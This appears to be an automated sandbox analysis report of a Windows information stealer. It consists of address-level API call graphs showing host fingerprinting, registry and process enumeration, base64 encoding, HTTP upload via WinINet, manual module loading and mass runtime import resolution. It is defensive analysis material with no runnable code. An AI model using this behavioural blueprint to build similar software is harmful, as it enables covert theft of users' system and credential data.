416fb0 4 API calls 71749->71750 71751 410119 71750->71751 71752 416ea0 lstrcpy 71751->71752 71753 410122 71752->71753 71754 416fb0 4 API calls 71753->71754 71755 410141 71754->71755 71756 416ea0 lstrcpy 71755->71756 71757 41014a 71756->71757 71758 416fb0 4 API calls 71757->71758 71759 41016b 71758->71759 71760 416ea0 lstrcpy 71759->71760 71761 410174 71760->71761 72372 4144b0 GetProcessHeap HeapAlloc GetTimeZoneInformation 71761->72372 71764 416fb0 4 API calls 71765 410194 71764->71765 71766 416ea0 lstrcpy 71765->71766 71767 41019d 71766->71767 71768 416fb0 4 API calls 71767->71768 71769 4101bc 71768->71769 71770 416ea0 lstrcpy 71769->71770 71771 4101c5 71770->71771 71772 416fb0 4 API calls 71771->71772 71773 4101e5 71772->71773 71774 416ea0 lstrcpy 71773->71774 71775 4101ee 71774->71775 72375 414530 GetUserDefaultLocaleName 71775->72375 71778 416fb0 4 API calls 71779 41020e 71778->71779 71780 416ea0 lstrcpy 71779->71780 71781 410217 71780->71781 71782 416fb0 4 API calls 71781->71782 71783 410236 71782->71783 71784 416ea0 lstrcpy 71783->71784 71785 41023f 71784->71785 71786 416fb0 4 API calls 71785->71786 71787 410260 71786->71787 71788 416ea0 lstrcpy 71787->71788 71789 410269 71788->71789 72380 414570 71789->72380 71791 410280 71792 416f20 3 API calls 71791->71792 71793 410293 71792->71793 71794 416ea0 lstrcpy 71793->71794 71795 41029c 71794->71795 71796 416fb0 4 API calls 71795->71796 71797 4102c6 71796->71797 71798 416ea0 lstrcpy 71797->71798 71799 4102cf 71798->71799 71800 416fb0 4 API calls 71799->71800 71801 4102ef 71800->71801 71802 416ea0 lstrcpy 71801->71802 71803 4102f8 71802->71803 72392 414710 GetSystemPowerStatus 71803->72392 71806 416fb0 4 API calls 71807 410318 71806->71807 71808 416ea0 lstrcpy 71807->71808 71809 410321 71808->71809 71810 416fb0 4 API calls 71809->71810 71811 410340 71810->71811 71812 416ea0 lstrcpy 71811->71812 71813 410349 71812->71813 71814 416fb0 4 API calls 71813->71814 71815 41036a 71814->71815 71816 416ea0 lstrcpy 71815->71816 71817 410373 71816->71817 71818 41037e GetCurrentProcessId 71817->71818 72394 415b70 OpenProcess 71818->72394 71821 416f20 3 API calls 71822 4103a4 71821->71822 71823 416ea0 lstrcpy 71822->71823 71824 4103ad 71823->71824 71825 416fb0 4 API calls 71824->71825 71826 4103d7 71825->71826 71827 416ea0 lstrcpy 71826->71827 71828 4103e0 71827->71828 71829 416fb0 4 API calls 71828->71829 71830 410400 71829->71830 71831 416ea0 lstrcpy 71830->71831 71832 410409 71831->71832 72399 414740 GetProcessHeap HeapAlloc RegOpenKeyExA 71832->72399 71834 410419 71835 416fb0 4 API calls 71834->71835 71836 410429 71835->71836 71837 416ea0 lstrcpy 71836->71837 71838 410432 71837->71838 71839 416fb0 4 API calls 71838->71839 71840 410451 71839->71840 71841 416ea0 lstrcpy 71840->71841 71842 41045a 71841->71842 71843 416fb0 4 API calls 71842->71843 71844 41047b 71843->71844 71845 416ea0 lstrcpy 71844->71845 71846 410484 71845->71846 72402 414800 71846->72402 71849 416fb0 4 API calls 71850 4104a4 71849->71850 71851 416ea0 lstrcpy 71850->71851 71852 4104ad 71851->71852 71853 416fb0 4 API calls 71852->71853 71854 4104cc 71853->71854 71855 416ea0 lstrcpy 71854->71855 71856 4104d5 71855->71856 71857 416fb0 4 API calls 71856->71857 71858 4104f6 71857->71858 71859 416ea0 lstrcpy 71858->71859 71860 4104ff 71859->71860 72417 4147c0 GetSystemInfo wsprintfA 71860->72417 71862 41050f 71863 416fb0 4 API calls 71862->71863 71864 41051f 71863->71864 71865 416ea0 lstrcpy 71864->71865 71866 410528 71865->71866 71867 416fb0 4 API calls 71866->71867 71868 410547 71867->71868 71869 416ea0 lstrcpy 71868->71869 71870 410550 71869->71870 71871 416fb0 4 API calls 71870->71871 71872 410570 71871->71872 71873 416ea0 lstrcpy 71872->71873 71874 410579 71873->71874 72418 414960 GetProcessHeap HeapAlloc 71874->72418 71876 410589 71877 416fb0 4 API calls 71876->71877 71878 410599 71877->71878 71879 416ea0 lstrcpy 71878->71879 71880 4105a2 71879->71880 71881 416fb0 4 API calls 71880->71881 71882 4105c1 71881->71882 71883 416ea0 lstrcpy 71882->71883 71884 4105ca 71883->71884 71885 416fb0 4 API calls 71884->71885 71886 4105eb 71885->71886 71887 416ea0 lstrcpy 71886->71887 71888 4105f4 71887->71888 72423 414ed0 71888->72423 71891 416f20 3 API calls 71892 41061e 71891->71892 71893 416ea0 lstrcpy 71892->71893 71894 410627 71893->71894 71895 416fb0 4 API calls 71894->71895 71896 410651 71895->71896 71897 416ea0 lstrcpy 71896->71897 71898 41065a 71897->71898 71899 416fb0 4 API calls 71898->71899 71900 41067a 71899->71900 71901 416ea0 lstrcpy 71900->71901 71902 410683 71901->71902 71903 416fb0 4 API calls 71902->71903 71904 4106a2 71903->71904 71905 416ea0 lstrcpy 71904->71905 71906 4106ab 71905->71906 72428 414a00 71906->72428 71908 4106c2 71909 416f20 3 API calls 71908->71909 71910 4106d5 71909->71910 71911 416ea0 lstrcpy 71910->71911 71912 4106de 71911->71912 71913 416fb0 4 API calls 71912->71913 71914 41070a 71913->71914 71915 416ea0 lstrcpy 71914->71915 71916 410713 71915->71916 71917 416fb0 4 API calls 71916->71917 71918 410732 71917->71918 71919 416ea0 lstrcpy 71918->71919 71920 41073b 71919->71920 71921 416fb0 4 API calls 71920->71921 71922 41075c 71921->71922 71923 416ea0 lstrcpy 71922->71923 71924 410765 71923->71924 71925 416fb0 4 API calls 71924->71925 71926 410784 71925->71926 71927 416ea0 lstrcpy 71926->71927 71928 41078d 71927->71928 71929 416fb0 4 API calls 71928->71929 71930 4107ae 71929->71930 71931 416ea0 lstrcpy 71930->71931 71932 4107b7 71931->71932 72436 414ae0 71932->72436 71934 4107d3 71935 416f20 3 API calls 71934->71935 71936 4107e6 71935->71936 71937 416ea0 lstrcpy 71936->71937 71938 4107ef 71937->71938 71939 416fb0 4 API calls 71938->71939 71940 410819 71939->71940 71941 416ea0 lstrcpy 71940->71941 71942 410822 71941->71942 71943 416fb0 4 API calls 71942->71943 71944 410843 71943->71944 71945 416ea0 lstrcpy 71944->71945 71946 41084c 71945->71946 71947 414ae0 17 API calls 71946->71947 71948 410868 71947->71948 71949 416f20 3 API calls 71948->71949 71950 41087b 71949->71950 71951 416ea0 lstrcpy 71950->71951 71952 410884 71951->71952 71953 416fb0 4 API calls 71952->71953 71954 4108ae 71953->71954 71955 416ea0 lstrcpy 71954->71955 71956 4108b7 71955->71956 71957 416fb0 4 API calls 71956->71957 71958 4108d6 71957->71958 71959 416ea0 lstrcpy 71958->71959 71960 4108df 71959->71960 71961 416fb0 4 API calls 71960->71961 71962 410900 71961->71962 71963 416ea0 lstrcpy 71962->71963 71964 410909 71963->71964 72472 414de0 71964->72472 71966 410920 71967 416f20 3 API calls 71966->71967 71968 410933 71967->71968 71969 416ea0 lstrcpy 71968->71969 71970 41093c 71969->71970 71971 41095a lstrlen 71970->71971 71972 41096a 71971->71972 71973 416d40 lstrcpy 71972->71973 71974 41097c 71973->71974 71975 401500 lstrcpy 71974->71975 71976 41098a 71975->71976 72482 404dc0 71976->72482 71978 410996 71978->70519 72662 4170d0 71979->72662 71981 404cc9 InternetOpenUrlA 71985 404ce1 71981->71985 71982 404cea InternetReadFile 71982->71985 71983 404d5c InternetCloseHandle InternetCloseHandle 71984 404da8 71983->71984 71984->70523 71985->71982 71985->71983 72663 4092b0 71986->72663 71988 40ef93 71989 40efb4 71988->71989 71990 40f1cf 71988->71990 71993 40efcd StrCmpCA 71989->71993 71991 401500 lstrcpy 71990->71991 71992 40f1dd 71991->71992 72827 40ea90 71992->72827 71995 40efd8 71993->71995 72020 40f04f 71993->72020 71997 416da0 lstrcpy 71995->71997 71999 40eff0 71997->71999 71998 40f06e StrCmpCA 72000 40f14e 71998->72000 72001 40f07d 71998->72001 72002 401500 lstrcpy 71999->72002 72005 40f17d StrCmpCA 72000->72005 72003 416d40 lstrcpy 72001->72003 72004 40f01e 72002->72004 72006 40f08a 72003->72006 72007 416da0 lstrcpy 72004->72007 72008 40f188 72005->72008 72028 40f1c7 72005->72028 72009 416fb0 4 API calls 72006->72009 72010 40f032 72007->72010 72012 401500 lstrcpy 72008->72012 72013 40f0b2 72009->72013 72011 416da0 lstrcpy 72010->72011 72014 40f04a 72011->72014 72015 40f196 72012->72015 72016 416f20 3 API calls 72013->72016 72666 40e420 72014->72666 72018 416da0 lstrcpy 72015->72018 72019 40f0b9 72016->72019 72021 40f1aa 72018->72021 72022 416fb0 4 API calls 72019->72022 72020->71998 72023 416da0 lstrcpy 72021->72023 72028->70527 72321 404486 72320->72321 72352 414ff0 malloc 72321->72352 72323 4044af 72353 414ff0 malloc 72323->72353 72325 4044c5 72354 414ff0 malloc 72325->72354 72327 4044db 72328 4044f5 lstrlen 72327->72328 72355 4170d0 72328->72355 72330 404505 InternetCrackUrlA 72331 404524 72330->72331 72331->71304 72333 416d40 lstrcpy 72332->72333 72334 415274 72333->72334 72335 416d40 lstrcpy 72334->72335 72336 415282 GetSystemTime 72335->72336 72338 415299 72336->72338 72337 416da0 lstrcpy 72339 4152fc 72337->72339 72338->72337 72339->71319 72341 416f31 72340->72341 72342 416f88 72341->72342 72345 416f68 lstrcpy lstrcat 72341->72345 72343 416da0 lstrcpy 72342->72343 72344 416f94 72343->72344 72344->71323 72345->72342 72346->71437 72348 4094d9 LocalAlloc 72347->72348 72349 404bae 72347->72349 72348->72349 72350 4094f4 CryptStringToBinaryA 72348->72350 72349->71325 72349->71328 72350->72349 72351 409519 LocalFree 72350->72351 72351->72349 72352->72323 72353->72325 72354->72327 72355->72330 72356->71447 72357->71599 72358->71601 72359->71603 72360->71605 72361->71609 72362->71611 72363->71620 72364->71627 72366 414362 RegCloseKey 72365->72366 72367 414345 RegQueryValueExA 72365->72367 72366->71693 72367->72366 72369 40ff99 72368->72369 72369->71708 72370->71721 72371->71749 72373 4144f7 wsprintfA 72372->72373 72374 410184 72372->72374 72373->72374 72374->71764 72376 4101fe 72375->72376 72377 41455a 72375->72377 72376->71778 72644 415420 LocalAlloc CharToOemW 72377->72644 72379 414566 72379->72376 72381 416d40 lstrcpy 72380->72381 72382 414589 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 72381->72382 72383 4145e2 72382->72383 72384 414603 GetLocaleInfoA 72383->72384 72385 4146d5 72383->72385 72388 416fb0 lstrcpy lstrlen lstrcpy lstrcat 72383->72388 72391 416ea0 lstrcpy 72383->72391 72384->72383 72386 4146e5 72385->72386 72387 4146db LocalFree 72385->72387 72389 416da0 lstrcpy 72386->72389 72387->72386 72388->72383 72390 4146f4 72389->72390 72390->71791 72391->72383 72393 410308 72392->72393 72393->71806 72395 415b93 K32GetModuleFileNameExA CloseHandle 72394->72395 72396 415bb5 72394->72396 72395->72396 72397 416d40 lstrcpy 72396->72397 72398 410391 72397->72398 72398->71821 72400 4147a2 RegCloseKey 72399->72400 72401 414785 RegQueryValueExA 72399->72401 72400->71834 72401->72400 72403 414836 GetLogicalProcessorInformationEx 72402->72403 72404 414855 GetLastError 72403->72404 72410 4148ab 72403->72410 72405 414860 72404->72405 72406 41489f 72404->72406 72416 414869 72405->72416 72409 410494 72406->72409 72648 4150f0 GetProcessHeap HeapFree 72406->72648 72409->71849 72647 4150f0 GetProcessHeap HeapFree 72410->72647 72413 4148fd 72413->72409 72415 414906 wsprintfA 72413->72415 72414 414893 72414->72409 72415->72409 72416->72403 72416->72414 72645 4150f0 GetProcessHeap HeapFree 72416->72645 72646 415110 GetProcessHeap HeapAlloc 72416->72646 72417->71862 72419 415090 72418->72419 72420 41498a GlobalMemoryStatusEx 72419->72420 72422 4149a0 __aulldiv 72420->72422 72421 4149d8 wsprintfA 72421->71876 72422->72421 72424 414ee8 GetProcessHeap HeapAlloc wsprintfA 72423->72424 72426 416d40 lstrcpy 72424->72426 72427 41060b 72426->72427 72427->71891 72429 416d40 lstrcpy 72428->72429 72431 414a16 72429->72431 72430 414a50 72432 416da0 lstrcpy 72430->72432 72431->72430 72434 416fb0 lstrcpy lstrlen lstrcpy lstrcat 72431->72434 72435 416ea0 lstrcpy 72431->72435 72433 414ac9 72432->72433 72433->71908 72434->72431 72435->72431 72437 416d40 lstrcpy 72436->72437 72438 414af9 RegOpenKeyExA 72437->72438 72439 414b4b 72438->72439 72440 414b6d 72438->72440 72441 416da0 lstrcpy 72439->72441 72442 414db0 RegCloseKey 72440->72442 72443 414b95 RegEnumKeyExA 72440->72443 72452 414b5a 72441->72452 72444 416da0 lstrcpy 72442->72444 72445 414dab 72443->72445 72446 414bdc wsprintfA RegOpenKeyExA 72443->72446 72444->72452 72445->72442 72447 414c22 RegCloseKey RegCloseKey 72446->72447 72448 414c5e RegQueryValueExA 72446->72448 72449 416da0 lstrcpy 72447->72449 72450 414c97 lstrlen 72448->72450 72451 414d9e RegCloseKey 72448->72451 72449->72452 72450->72451 72453 414cad 72450->72453 72451->72445 72452->71934 72454 416fb0 4 API calls 72453->72454 72455 414cc4 72454->72455 72456 416ea0 lstrcpy 72455->72456 72457 414cd0 72456->72457 72458 416fb0 4 API calls 72457->72458 72459 414cf4 72458->72459 72460 416ea0 lstrcpy 72459->72460 72461 414d00 72460->72461 72462 414d0b RegQueryValueExA 72461->72462 72462->72451 72463 414d40 72462->72463 72464 416fb0 4 API calls 72463->72464 72465 414d57 72464->72465 72466 416ea0 lstrcpy 72465->72466 72467 414d63 72466->72467 72468 416fb0 4 API calls 72467->72468 72469 414d87 72468->72469 72470 416ea0 lstrcpy 72469->72470 72471 414d93 72470->72471 72471->72451 72473 416d40 lstrcpy 72472->72473 72474 414df9 CreateToolhelp32Snapshot Process32First 72473->72474 72475 414e25 Process32Next 72474->72475 72476 414e9a FindCloseChangeNotification 72474->72476 72475->72476 72479 414e3a 72475->72479 72477 416da0 lstrcpy 72476->72477 72478 414eb3 72477->72478 72478->71966 72479->72475 72480 416fb0 lstrcpy lstrlen lstrcpy lstrcat 72479->72480 72481 416ea0 lstrcpy 72479->72481 72480->72479 72481->72479 72483 416da0 lstrcpy 72482->72483 72484 404dd9 72483->72484 72485 404470 3 API calls 72484->72485 72486 404de5 72485->72486 72649 4155a0 72486->72649 72488 404e3e 72489 404e49 lstrlen 72488->72489 72490 404e59 72489->72490 72491 4155a0 4 API calls 72490->72491 72492 404e6a 72491->72492 72493 416d40 lstrcpy 72492->72493 72494 404e7d 72493->72494 72495 416d40 lstrcpy 72494->72495 72496 404e8a 72495->72496 72497 416d40 lstrcpy 72496->72497 72498 404e97 72497->72498 72499 416d40 lstrcpy 72498->72499 72500 404ea4 72499->72500 72501 416d40 lstrcpy 72500->72501 72502 404eb1 InternetOpenA StrCmpCA 72501->72502 72503 404ee3 72502->72503 72504 405578 InternetCloseHandle 72503->72504 72505 415260 3 API calls 72503->72505 72511 40558d moneypunct 72504->72511 72506 404f02 72505->72506 72507 416f20 3 API calls 72506->72507 72508 404f15 72507->72508 72509 416ea0 lstrcpy 72508->72509 72510 404f1e 72509->72510 72512 416fb0 4 API calls 72510->72512 72514 416da0 lstrcpy 72511->72514 72513 404f5f 72512->72513 72515 416f20 3 API calls 72513->72515 72522 4055c7 72514->72522 72516 404f66 72515->72516 72517 416fb0 4 API calls 72516->72517 72518 404f6d 72517->72518 72519 416ea0 lstrcpy 72518->72519 72520 404f76 72519->72520 72521 416fb0 4 API calls 72520->72521 72523 404fb7 72521->72523 72522->71978 72524 416f20 3 API calls 72523->72524 72525 404fbe 72524->72525 72526 416ea0 lstrcpy 72525->72526 72527 404fc7 72526->72527 72528 404fdd InternetConnectA 72527->72528 72528->72504 72529 40500d HttpOpenRequestA 72528->72529 72531 40556b InternetCloseHandle 72529->72531 72532 40506b 72529->72532 72531->72504 72533 416fb0 4 API calls 72532->72533 72534 40507f 72533->72534 72535 416ea0 lstrcpy 72534->72535 72536 405088 72535->72536 72537 416f20 3 API calls 72536->72537 72538 4050a6 72537->72538 72539 416ea0 lstrcpy 72538->72539 72540 4050af 72539->72540 72541 416fb0 4 API calls 72540->72541 72542 4050ce 72541->72542 72543 416ea0 lstrcpy 72542->72543 72544 4050d7 72543->72544 72545 416fb0 4 API calls 72544->72545 72546 4050f8 72545->72546 72547 416ea0 lstrcpy 72546->72547 72548 405101 72547->72548 72549 416fb0 4 API calls 72548->72549 72644->72379 72645->72416 72646->72416 72647->72413 72648->72409 72650 4155a9 72649->72650 72651 4155ad CryptBinaryToStringA 72649->72651 72650->72488 72651->72650 72652 4155ce GetProcessHeap RtlAllocateHeap 72651->72652 72652->72650 72653 4155f4 moneypunct 72652->72653 72654 415605 CryptBinaryToStringA 72653->72654 72654->72650 72662->71981 72902 409260 72663->72902 72665 4092c1 72665->71988 72828 416d40 lstrcpy 72827->72828 72829 40eaa6 72828->72829 72830 4154e0 2 API calls 72829->72830 72831 40eabb 72830->72831 72832 416f20 3 API calls 72831->72832 72833 40eacb 72832->72833 72834 416ea0 lstrcpy 72833->72834 72835 40ead4 72834->72835 72907 414ff0 malloc 72902->72907 72904 40926d 72908 406990 72904->72908 72906 40928c moneypunct 72906->72665 72907->72904 72911 406730 72908->72911 72912 406753 72911->72912 72928 406749 72911->72928 72929 405f20 72912->72929 72916 4067ae 72916->72928 72941 4063a0 72916->72941 72920 40683a 72921 4068d6 VirtualFree 72920->72921 72923 4068e7 72920->72923 72920->72928 72921->72923 72922 406931 72922->72928 72923->72922 72925 406916 FreeLibrary 72923->72925 72926 406928 72923->72926 72925->72923 72928->72906 72931 405f32 72929->72931 72930 405f39 72930->72928 72935 406050 72930->72935 72931->72930 72932 405fbe 72931->72932 72958 415110 GetProcessHeap HeapAlloc 72932->72958 72934 405fe0 72934->72930 72938 40607f VirtualAlloc 72935->72938 72937 406120 72939 406133 VirtualAlloc 72937->72939 72940 40612c 72937->72940 72938->72937 72938->72940 72939->72940 72940->72916 72942 4063c5 72941->72942 72943 4063b9 72941->72943 72942->72928 72952 4065d0 72942->72952 72943->72942 72944 4063f9 LoadLibraryA 72943->72944 72945 406422 72944->72945 72947 406418 72944->72947 72946 4064cc 72945->72946 72959 415110 GetProcessHeap HeapAlloc 72945->72959 72946->72947 72949 406594 GetProcAddress 72946->72949 72947->72942 72949->72946 72949->72947 72951 40647b 72951->72947 72960 4150f0 GetProcessHeap HeapFree 72951->72960 72955 4065eb 72952->72955 72953 406670 VirtualProtect 72954 406699 72953->72954 72953->72955 72954->72920 72955->72953 72955->72954 72958->72934 72959->72951 72960->72946 74059 6bbab8ae 74060 6bbab8ba ___scrt_is_nonwritable_in_current_image 74059->74060 74061 6bbab8e3 dllmain_raw 74060->74061 74062 6bbab8de 74060->74062 74070 6bbab8c9 74060->74070 74063 6bbab8fd dllmain_crt_dispatch 74061->74063 74061->74070 74072 6bb8bed0 DisableThreadLibraryCalls LoadLibraryExW 74062->74072 74063->74062 74063->74070 74065 6bbab91e 74066 6bbab94a 74065->74066 74073 6bb8bed0 DisableThreadLibraryCalls LoadLibraryExW 74065->74073 74067 6bbab953 dllmain_crt_dispatch 74066->74067 74066->74070 74068 6bbab966 dllmain_raw 74067->74068 74067->74070 74068->74070 74071 6bbab936 dllmain_crt_dispatch dllmain_raw 74071->74066 74072->74065 74073->74071 74074 6bb735a0 74075 6bb735c4 InitializeCriticalSectionAndSpinCount getenv 74074->74075 74090 6bb73846 __aulldiv 74074->74090 74076 6bb738fc strcmp 74075->74076 74081 6bb735f3 __aulldiv 74075->74081 74080 6bb73912 strcmp 74076->74080 74076->74081 74078 6bb735f8 QueryPerformanceFrequency 74078->74081 74079 6bb738f4 74080->74081 74081->74078 74082 6bb73622 _strnicmp 74081->74082 74083 6bb73944 _strnicmp 74081->74083 74085 6bb7395d 74081->74085 74086 6bb73664 GetSystemTimeAdjustment 74081->74086 74088 6bb7375c 74081->74088 74082->74081 74082->74083 74083->74081 74083->74085 74084 6bb7376a QueryPerformanceCounter EnterCriticalSection 74087 6bb737b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 74084->74087 74084->74088 74086->74081 74087->74088 74089 6bb737fc LeaveCriticalSection 74087->74089 74088->74084 74088->74087 74088->74089 74088->74090 74089->74088 74089->74090 74091 6bbab320 5 API calls ___raise_securityfailure 74090->74091 74091->74079 74092 6bb73060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 74097 6bbaab2a 74092->74097 74096 6bb730db 74101 6bbaae0c _crt_atexit _register_onexit_function 74097->74101 74099 6bb730cd 74100 6bbab320 5 API calls ___raise_securityfailure 74099->74100 74100->74096 74101->74099 74102 6bb8c930 GetSystemInfo VirtualAlloc 74103 6bb8c9a3 GetSystemInfo 74102->74103 74104 6bb8c973 74102->74104 74106 6bb8c9d0 74103->74106 74107 6bb8c9b6 74103->74107 74118 6bbab320 5 API calls ___raise_securityfailure 74104->74118 74106->74104 74110 6bb8c9d8 VirtualAlloc 74106->74110 74107->74106 74109 6bb8c9bd 74107->74109 74108 6bb8c99b 74109->74104 74111 6bb8c9c1 VirtualFree 74109->74111 74112 6bb8c9ec 74110->74112 74113 6bb8c9f0 74110->74113 74111->74104 74112->74104 74119 6bbacbe8 GetCurrentProcess TerminateProcess 74113->74119 74118->74108 74120 6bbab9c0 74121 6bbab9c9 74120->74121 74122 6bbab9ce dllmain_dispatch 74120->74122 74124 6bbabef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 74121->74124 74124->74122 74125 6bbab694 74126 6bbab6a0 ___scrt_is_nonwritable_in_current_image 74125->74126 74155 6bbaaf2a 74126->74155 74128 6bbab6a7 74129 6bbab6d1 74128->74129 74130 6bbab796 74128->74130 74133 6bbab6ac ___scrt_is_nonwritable_in_current_image 74128->74133 74159 6bbab064 74129->74159 74172 6bbab1f7 IsProcessorFeaturePresent 74130->74172 74134 6bbab6e0 __RTC_Initialize 74134->74133 74162 6bbabf89 InitializeSListHead 74134->74162 74136 6bbab6ee ___scrt_initialize_default_local_stdio_options 74138 6bbab6f3 _initterm_e 74136->74138 74137 6bbab79d ___scrt_is_nonwritable_in_current_image 74139 6bbab828 74137->74139 74140 6bbab7d2 74137->74140 74154 6bbab7b3 ___scrt_uninitialize_crt __RTC_Initialize 74137->74154 74138->74133 74141 6bbab708 74138->74141 74142 6bbab1f7 ___scrt_fastfail 6 API calls 74139->74142 74176 6bbab09d _execute_onexit_table _cexit ___scrt_release_startup_lock 74140->74176 74163 6bbab072 74141->74163 74146 6bbab82f 74142->74146 74144 6bbab7d7 74177 6bbabf95 __std_type_info_destroy_list 74144->74177 74150 6bbab83b 74146->74150 74151 6bbab86e dllmain_crt_process_detach 74146->74151 74148 6bbab70d 74148->74133 74149 6bbab711 _initterm 74148->74149 74149->74133 74152 6bbab860 dllmain_crt_process_attach 74150->74152 74153 6bbab840 74150->74153 74151->74153 74152->74153 74156 6bbaaf33 74155->74156 74178 6bbab341 IsProcessorFeaturePresent 74156->74178 74158 6bbaaf3f ___scrt_uninitialize_crt 74158->74128 74179 6bbaaf8b 74159->74179 74161 6bbab06b 74161->74134 74162->74136 74164 6bbab077 ___scrt_release_startup_lock 74163->74164 74165 6bbab07b 74164->74165 74166 6bbab082 74164->74166 74189 6bbab341 IsProcessorFeaturePresent 74165->74189 74169 6bbab087 _configure_narrow_argv 74166->74169 74168 6bbab080 74168->74148 74170 6bbab092 74169->74170 74171 6bbab095 _initialize_narrow_environment 74169->74171 74170->74148 74171->74168 74173 6bbab20c ___scrt_fastfail 74172->74173 74174 6bbab218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 74173->74174 74175 6bbab302 ___scrt_fastfail 74174->74175 74175->74137 74176->74144 74177->74154 74178->74158 74180 6bbaaf9a 74179->74180 74181 6bbaaf9e 74179->74181 74180->74161 74182 6bbab028 74181->74182 74185 6bbaafab ___scrt_release_startup_lock 74181->74185 74183 6bbab1f7 ___scrt_fastfail 6 API calls 74182->74183 74184 6bbab02f 74183->74184 74186 6bbaafb8 _initialize_onexit_table 74185->74186 74187 6bbaafd6 74185->74187 74186->74187 74188 6bbaafc7 _initialize_onexit_table 74186->74188 74187->74161 74188->74187 74189->74168

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 617 416240-41624a 618 416250-416661 GetProcAddress * 43 617->618 619 416666-4166fa LoadLibraryA * 8 617->619 618->619 620 416776-41677d 619->620 621 4166fc-416771 GetProcAddress * 5 619->621 622 416783-416841 GetProcAddress * 8 620->622 623 416846-41684d 620->623 621->620 622->623 624 4168c8-4168cf 623->624 625 41684f-4168c3 GetProcAddress * 5 623->625 626 4168d5-416962 GetProcAddress * 6 624->626 627 416967-41696e 624->627 625->624 626->627 628 416974-416a4a GetProcAddress * 9 627->628 629 416a4f-416a56 627->629 628->629 630 416ad2-416ad9 629->630 631 416a58-416acd GetProcAddress * 5 629->631 632 416adb-416b07 GetProcAddress * 2 630->632 633 416b0c-416b13 630->633 631->630 632->633 634 416b45-416b4c 633->634 635 416b15-416b40 GetProcAddress * 2 633->635 636 416b52-416c10 GetProcAddress * 8 634->636 637 416c15-416c1c 634->637 635->634 636->637 638 416c7f-416c86 637->638 639 416c1e-416c7a GetProcAddress * 4 637->639 640 416ca1-416ca8 638->640 641 416c88-416c9c GetProcAddress 638->641 639->638 642 416d0b-416d0c 640->642 643 416caa-416d06 GetProcAddress * 4 640->643 641->640 643->642
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042D4198), ref: 0041625D
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042D42B8), ref: 00416275
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F06C8), ref: 0041628E
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F0728), ref: 004162A6
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F06E0), ref: 004162BE
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F06F8), ref: 004162D7
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042EFA48), ref: 004162EF
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F0680), ref: 00416307
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F6478), ref: 00416320
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F62C8), ref: 00416338
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F6340), ref: 00416350
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042D43F8), ref: 00416369
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042D4378), ref: 00416381
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042D4618), ref: 00416399
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042D45F8), ref: 004163B2
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F61F0), ref: 004163CA
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F62F8), ref: 004163E2
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042EF8B8), ref: 004163FB
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042D43D8), ref: 00416413
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F6448), ref: 0041642B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F61A8), ref: 00416444
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F6208), ref: 0041645C
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F6298), ref: 00416474
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042D44B8), ref: 0041648D
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F62B0), ref: 004164A5
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F61C0), ref: 004164BD
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F6250), ref: 004164D6
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F6310), ref: 004164EE
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F6358), ref: 00416506
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F6328), ref: 0041651F
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F6268), ref: 00416537
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F6220), ref: 0041654F
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F6280), ref: 00416568
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F2258), ref: 00416580
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F6400), ref: 00416598
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F6238), ref: 004165B1
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042D4418), ref: 004165C9
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F6460), ref: 004165E1
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042D44D8), ref: 004165FA
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F6370), ref: 00416612
